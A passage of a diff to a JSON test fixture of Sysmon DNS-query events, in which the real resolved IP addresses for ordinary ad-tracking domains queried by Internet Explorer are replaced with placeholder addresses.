Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6381,7 +6381,7 @@ "event_data": { "QueryName": "rp.gwallet.com", "QueryStatus": "0", - "QueryResults": "::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.943", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6408,7 +6408,7 @@ "@timestamp": "2021-05-05T15:30:51.709Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6416,7 +6416,7 @@ "event_data": { "QueryName": "ads.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;", + "QueryResults": "type: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.945", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6450,7 +6450,7 @@ "@timestamp": "2021-05-05T15:30:51.709Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6466,7 +6466,7 @@ "ProcessId": "2736", "QueryName": "um.simpli.fi", "QueryStatus": "0", - "QueryResults": "::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -6513,7 +6513,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.955", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6534,7 +6534,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -6543,7 +6543,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:8.41.222.152;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6561,7 +6561,7 @@ "ProcessId": "2736", "QueryName": "sync.1rx.io", "QueryStatus": "0", - "QueryResults": "::ffff:8.41.222.152;" + "QueryResults": "::ffff:89.160.20.156;" }, "process": { "pid": 2828, @@ -6585,7 +6585,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -6606,7 +6606,7 @@ "ProcessId": "2736", "QueryName": "sync.teads.tv", "QueryStatus": "0", - "QueryResults": "type: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;", + "QueryResults": "type: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.956", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -6644,7 +6644,7 @@ "ProcessId": "2736", "QueryName": "s.thebrighttag.com", "QueryStatus": "0", - "QueryResults": "type: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -6654,7 +6654,7 @@ "version": 5 }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -6688,7 +6688,7 @@ "event_data": { "QueryName": "t.a3cloud.net", "QueryStatus": "0", - "QueryResults": "type: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;", + "QueryResults": "type: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.050", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6699,7 +6699,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 